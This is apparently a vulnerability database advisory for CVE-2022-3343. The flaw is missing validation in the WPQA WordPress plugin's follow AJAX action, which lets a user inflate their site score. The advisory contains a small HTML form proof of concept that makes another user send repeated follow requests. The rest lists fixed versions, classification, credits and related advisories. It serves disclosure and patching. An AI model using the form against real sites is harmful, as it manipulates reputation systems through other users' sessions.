WPQA < 5.9.3 – Missing validation lead to functionality abuse | CVE 2022-3343 | Plugin Vulnerabilities

Description

The plugin (which is a companion plugin used with Discy and Himer themes) incorrectly tries to validate that a user already follows another in the wpqa_following_you_ajax action, allowing a user to inflate their score on the site by having another user send repeated follow actions to them.

Proof of Concept

<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
	<input type="hidden" name="action" value="wpqa_following_you">

        <!-- change the following value to the user id of the user you wish to reward! -->
	<input type="hidden" name="following_var_id" value="2">

        <!-- Version 5.9.1 checks nonce, replace with the correct one for the user submitting the form. -->
        <input type="hidden" name="following_nonce" value="1234567890">

	<input type="submit" value="Get rich!">
</form>

Affects Plugins

Fixed in 5.9.3

Affects Themes

Fixed in 5.5.3

Fixed in 1.9.3

References

CVE

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Harsh Tandel

Submitter

Harsh Tandel

Submitter twitter

Verified

Yes

WPVDB ID

e507b1b5-1a56-4b2f-b7e7-e22f6da1e32a

Timeline

Publicly Published

2022-12-13 (about 3 years ago)

Added

2022-12-13 (about 3 years ago)

Last Updated

2023-03-16 (about 2 years ago)

Other

Published

Title

Published

2025-11-18

Title

SiteSEO – SEO Simplified < 1.3.3 - Sensitive Post Meta Disclosure via IDOR

Published

2024-03-29

Title

Whizzy <= 1.1.18 - Authenticated (Subscriber+) Insecure Direct Object Reference

Published

2024-07-09

Title

ProfileGrid < 5.9.0 - Authenticated (Subscriber+) Insecure Direct Object Reference

Published

2022-12-02

Title

Workreap < 2.6.4 - Subscriber+ Arbitrary Posts Deletion via IDOR

Published

2025-03-24

Title

User Registration & Membership (Free < 4.1.2, Pro < 5.1.2) - Unauthenticated Privilege Escalation